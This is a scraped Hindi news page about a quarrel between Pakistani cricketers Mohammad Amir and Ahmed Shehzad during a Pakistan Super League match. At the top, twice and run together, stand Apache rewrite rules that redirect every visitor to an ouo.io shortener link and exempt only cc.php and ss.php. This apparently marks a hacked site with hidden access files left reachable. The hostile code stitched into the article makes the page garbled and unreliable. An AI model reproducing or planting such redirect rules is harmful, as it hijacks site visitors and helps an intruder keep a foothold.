
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 277
Previous Nextनई दिल्ली। पाकिस्तान सुपर लीग का तीसरा संस्करण इन दिनों सुर्खियों पर है। इस लीग के 22वें मैच में पाकिस्तान टीम के लिए खेलने वाले दो खिलाड़ी मैच के दौरान एक-दूसरे से भिड़ गए। हालांकि ये दोनों खिलाड़ी इस लीग में अलग-अलग टीमों के लिए खेल रहे हैं। जिन दो खिलाड़ियों के बीच मैदान पर कहा सुनी हुई उनमें मो. आमिर थे जो कराची के लिए खेल रहे थे और दूसरे खिलाड़ी अहमद शहजाद थे जो सुल्तान मुल्तान्स टीम के लिए इस लीग में खेल रहे हैं। इससे पहले भी इस लीग के 19 वें मुकाबले में पाकिस्तान के दो खिलाड़ी राहत अली और इमाद वसीम आपस में भिड़ चुके थे। कराची के खिलाड़ी आमिर और अहमद शहजाद के बीच हुई तनातनी का वीडियो वायरल हो गया है। इस वीडियो में साफ दिख रहा है कि पहले आमिर शहजाद को कुछ बोलते हैं और फिर शहजाद उन्हें जबाव देते हैं। इसके बाद कराची के कप्तान अफरीदी मो. आमिर से कहते नजर आते हैं कि वो शांत रहें और अपनी गेंदबाजी पर ध्यान दें। कराची और मुल्तान के बीच खेले गए इस मैच में अफरीदी की कमाल की गेंदबाजी के दम पर कराची को जीत मिली। इस मैच में टीम के कप्तान अफरीदी ने 18 रन देकर 3 विकेट लिए। अफरीदी की कप्तानी में ये उनकी टीम की चौथी जीत थी। इस जीत के साथ कराची की टीम इस वक्त अंक तालिका में तीसरे नंबर पर है। वहीं मुल्तान की टीम 9 अंक के साथ चौथे नंबर पर मौजूद है।